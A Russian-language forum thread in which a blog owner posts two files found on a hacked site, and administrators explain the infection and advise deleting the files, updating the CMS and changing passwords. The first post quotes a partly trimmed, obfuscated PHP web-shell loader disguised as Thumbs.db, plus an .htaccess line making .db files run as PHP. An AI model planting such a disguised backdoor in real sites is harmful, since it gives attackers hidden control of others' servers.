|
11.01.2015, 01:33
|
#1
|
Новичок
Регистрация: 11.01.2015
Сообщений: 4
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
|
Что-то с сайтом( файлы с таким содержанием
Здравствуйте! Недавно нашел на сайте два левых файла, вот их содержимое:
1) файл .htaccess
AddType application/x-httpd-php .db
2) файл Thumbs.db
<?php $____=base64_decode('eJwMl2V/2+j2tb/l/8WhmXJT (чать кода убрал) nduuoXI4s3/B4BK2tA=');if(isset($_POST['_']) && isset($_POST['__'])){$_=$_POST['_'];$__=$_POST['__'];}elseif(isset($_COOKIE['_']) && isset($_COOKIE['__'])){$_=$_COOKIE['_'];$__=$_COOKIE['__'];}if(!empty($_) && !empty($__)){$___=$_.md5($__);$________='';$____=@ gzuncompress($____);$______=strlen($____);for($___ __=0;$_____<=$______;$_____++){$_______=chr((ord($ ____[$_____])-ord($___[$_____]))%256);$________.=$_______;$___.=$_______;}if($__ ______=@gzuncompress(@base64_decode($________))){s etcookie('_',$_);setcookie('__',$__);$________=cre ate_function('','?>'.$________.'<?php die();');$________();}}die('<center style="color:#777;font:normal 11px verdana;background:#000;"><form action="" method="post">login : <input type="text" name="_"/> password : <input type="text" name="__"/> <input type="submit" value="go"/></form></center>');?>
яндекс выкинул сайт из поиска как вредоносный
Вопрос: Что это ? и акие еще последствия могут быть от таких скриптов?
ЗЫ
Спасибо.
Последний раз редактировалось Игорь; 11.01.2015 в 01:43.
Причина: Оформляйте темы
|
|
|
11.01.2015, 01:48
|
#2
|
Администратор
Регистрация: 21.11.2014
Сообщений: 2,965
Сказал(а) спасибо: 12
Поблагодарили 86 раз(а) в 80 сообщениях
Настроение:
|
Re: Что-то с сайтом( файлы с таким содержанием
похоже эти файло - части от вирья, вашь сайт заражен, файлы в удаление, обновите cms, видать есть дыры, и еще ищите может какие банеры ставили, с ними и прописали вредоносные скрипты .
|
|
|
11.01.2015, 01:53
|
#3
|
Новичок
ТС
Регистрация: 11.01.2015
Сообщений: 4
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
|
Re: Что-то с сайтом( файлы с таким содержанием
и для чего они так делают?
|
|
|
11.01.2015, 01:55
|
#4
|
Администратор
Регистрация: 21.11.2014
Сообщений: 1,871
Сказал(а) спасибо: 109
Поблагодарили 21 раз(а) в 17 сообщениях
|
Re: Что-то с сайтом( файлы с таким содержанием
Цитата:
Сообщение от william
и для чего они так делают?
|
а как вы думаете? Чтобы завладеть Вашим сайтом или напакастить
надо просто чётко и слажено следить за работоспособностью сайта
|
|
|
Пользователь сказал cпасибо:
|
|
11.01.2015, 01:58
|
#5
|
Новичок
ТС
Регистрация: 11.01.2015
Сообщений: 4
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
|
Re: Что-то с сайтом( файлы с таким содержанием
это небольшой блог, 2 недели как созданный, зачем им такое?
|
|
|
11.01.2015, 02:01
|
#6
|
Администратор
Регистрация: 21.11.2014
Сообщений: 1,871
Сказал(а) спасибо: 109
Поблагодарили 21 раз(а) в 17 сообщениях
|
Re: Что-то с сайтом( файлы с таким содержанием
Цитата:
Сообщение от william
зачем им такое?
|
чтобы вы в дальнейшем не улучшили защиту, так сказать на начальном уровне вы уязвимы, Вас "ломают"
|
|
|
11.01.2015, 02:02
|
#7
|
Администратор
Регистрация: 21.11.2014
Сообщений: 2,965
Сказал(а) спасибо: 12
Поблагодарили 86 раз(а) в 80 сообщениях
Настроение:
|
Re: Что-то с сайтом( файлы с таким содержанием
ну как зачем. Спам рассылать или себе все присвоить.
Ломают, что могут сломать.
Обновляйте движок и плагины, смените пароли доступа к хостингу, и пароль почты на которую зареган акк администратора сайта .
|
|
|
11.01.2015, 02:08
|
#8
|
Новичок
ТС
Регистрация: 11.01.2015
Сообщений: 4
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
|
Re: Что-то с сайтом( файлы с таким содержанием
там и не обоготиться сейчас, не понимаю.
|
|
|
11.01.2015, 02:11
|
#9
|
Администратор
Регистрация: 21.11.2014
Сообщений: 2,965
Сказал(а) спасибо: 12
Поблагодарили 86 раз(а) в 80 сообщениях
Настроение:
|
Re: Что-то с сайтом( файлы с таким содержанием
william, даже не ищите смысл взлома именно вашего сайта.
Взломщики занимаются этим не из-за "нравится/не нравится сайт", а по принципу - ломают все что ломается.
Цели любые - спам, присвоение статей, хулиганство, заработок на рекламе и т.д. и т.п.
Лучше принимайте меры, какие описаны выше.
|
|
|
11.01.2015, 02:11
|
#10
|
Администратор
Регистрация: 21.11.2014
Сообщений: 1,871
Сказал(а) спасибо: 109
Поблагодарили 21 раз(а) в 17 сообщениях
|
Re: Что-то с сайтом( файлы с таким содержанием
всё равно, держите свой сайт в порядке, мы же работаем со своим детищем и у Вас получится. будет сложности, поможем
|
|
|
Ваши права в разделе
|
Вы можете создавать новые темы
Вы можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
HTML код Выкл.
|
|
|
Текущее время: 14:16. Часовой пояс GMT +3.
| |